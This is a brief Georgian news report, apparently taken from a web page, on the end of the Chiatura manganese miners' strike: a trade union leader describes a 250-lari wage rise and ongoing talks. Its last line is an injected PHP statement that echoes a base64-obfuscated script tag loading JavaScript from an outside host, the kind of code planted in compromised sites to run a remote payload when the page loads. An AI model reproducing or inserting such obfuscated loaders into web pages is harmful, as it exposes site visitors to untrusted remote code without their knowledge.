celsiusi
ავერსი საქკაბელი
მეტალურგთა პროფკავშირის თავმჯდომარის თამაზ დოლაბერიძის განცხადებით, ჭიათურის მაღაროს თამამშრომლების გაფიცვა დასრულებულია.
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს დოლაბერიძემ განუცხადა, ყველა ის ობიექტი, რომელიც მარგანეცის მოპოვებას და გამდიდრებას ემსახურება ამუშავდა.
 
“გაფიცვა გუშინ საღამოდან შეწყდა, 250 ლარი დაემატათ ხელფასზე დასაქმებულებს, დანარჩენ პუნქტებზე ვაგრძელებთ შეთანხმებას და ვფიქრობ ხვალ საღამოსთვის დასრულდება და ოთხშაბათს ხელი მოეწერება. საუბარია იმ პუნქტებზე რომელიც კომპანიამ დასაქმებულებს შესთავაზა"- განუცხადა თამაზ დოლაბერიძემ BUSINESS TIME -ს. 
 
შეგახსენებთ, რომ მაღაროელების მოთხოვნა იყო ხელფასების მატება 50%-ით,რის გამოც ისინი 23 აპრილს გაიფიცნენ, გაჩერებული იყო ყველა მაღარო. აღნიშნულ საკითხზე რამდენიმე მოლაპარაკება გაიმართა კომპანიის მენეჯმენტთან. კომპანიამ დასაქმებულებს 250 ლარით ხელფასის გაზრდა, რაც 25% ზრდას გულისხმობს, და ყოველწლიური ინდექსაცია ინფლაციის შესაბმაბისად, (ინდექსაცია საქთართევლოს სტატისიტიკის ეროვნული სამსახურის მიერ გამოქვეყნებული  ინფლაციის მაჩვენებლების მიხედვით) შესთავაზა. 
 
 
 
1244
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");